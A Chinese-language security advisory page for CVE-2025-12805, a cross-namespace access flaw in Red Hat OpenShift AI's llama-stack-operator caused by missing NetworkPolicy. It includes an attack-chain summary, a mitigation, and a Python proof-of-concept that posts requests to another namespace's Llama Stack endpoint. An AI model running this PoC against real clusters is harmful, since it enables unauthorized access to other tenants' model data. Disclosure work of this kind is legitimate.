CVE-2025-12805 CVSS 8.1 高危

CVE-2025-12805 Red Hat OpenShift AI 权限绕过漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12805

漏洞类型

权限绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Red Hat OpenShift AI (RHOAI) llama-stack-operator

漏洞概述

Red Hat OpenShift AI (RHOAI) 的 llama-stack-operator 组件存在安全缺陷。由于未配置 NetworkPolicy 限制对 llama-stack 服务端点的访问，攻击者可利用直接网络请求跨越命名空间边界，未经授权访问其他用户的 Llama Stack 服务实例。这可能导致敏感数据泄露或被恶意篡改，CVSS评分为8.1，属于高危漏洞。

技术细节

该漏洞的根因在于 Red Hat OpenShift AI (RHOAI) 在部署 llama-stack-operator 时，未为 llama-stack 服务配置 Kubernetes NetworkPolicy。在 Kubernetes 集群中，若未定义 NetworkPolicy，Pod 间的网络流量默认是全通的。攻击者只需在集群内拥有一个低权限账号（满足 CVSS PR:L 要求），并获取到目标命名空间中 Llama Stack 服务的 ClusterIP 或内部 DNS 名称。由于缺乏网络隔离机制，攻击者可以直接向目标服务发送恶意网络请求。这利用了多租户环境下的网络隔离缺失问题，使得攻击者能够横向移动，访问非授权命名空间内的服务实例，进而窃取模型数据或提交恶意指令，造成数据泄露或完整性破坏。

攻击链分析

STEP 1

1. 信息收集

攻击者在集群内部枚举服务和命名空间，寻找目标 llama-stack 服务的内部DNS地址或ClusterIP。

STEP 2

2. 发起攻击

攻击者利用默认的网络策略缺失，直接向目标命名空间的 llama-stack 服务端点发送HTTP请求。

STEP 3

3. 数据窃取/篡改

由于缺乏认证隔离，攻击者成功获取服务响应，读取敏感模型数据或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2025-12805: Unauthorized Access to Llama Stack Services
# Description: This script attempts to access a target Llama Stack service in a different namespace.
# Prerequisites: Network access to the cluster (internal pod or compromised node).

def exploit(target_namespace, target_service, port):
    # Construct the internal DNS name for the service
    target_url = f"http://{target_service}.{target_namespace}.svc.cluster.local:{port}/v1/chat"
    
    headers = {
        "Content-Type": "application/json"
    }
    
    # Malicious payload to test access
    data = {
        "query": "List all sensitive data"
    }

    try:
        print(f"[*] Attempting to connect to: {target_url}")
        response = requests.post(target_url, json=data, headers=headers, timeout=5)
        
        if response.status_code == 200:
            print(f"[+] Exploit Successful! Unauthorized access confirmed.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    # Example configuration
    TARGET_NAMESPACE = "victim-ai-project"
    TARGET_SERVICE = "llama-stack"
    PORT = "8080"
    
    exploit(TARGET_NAMESPACE, TARGET_SERVICE, PORT)

影响范围

Red Hat OpenShift AI (RHOAI) llama-stack-operator (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

建议立即在受影响的命名空间中手动配置 NetworkPolicy，阻断来自非授权命名空间的网络流量，直至完成组件升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表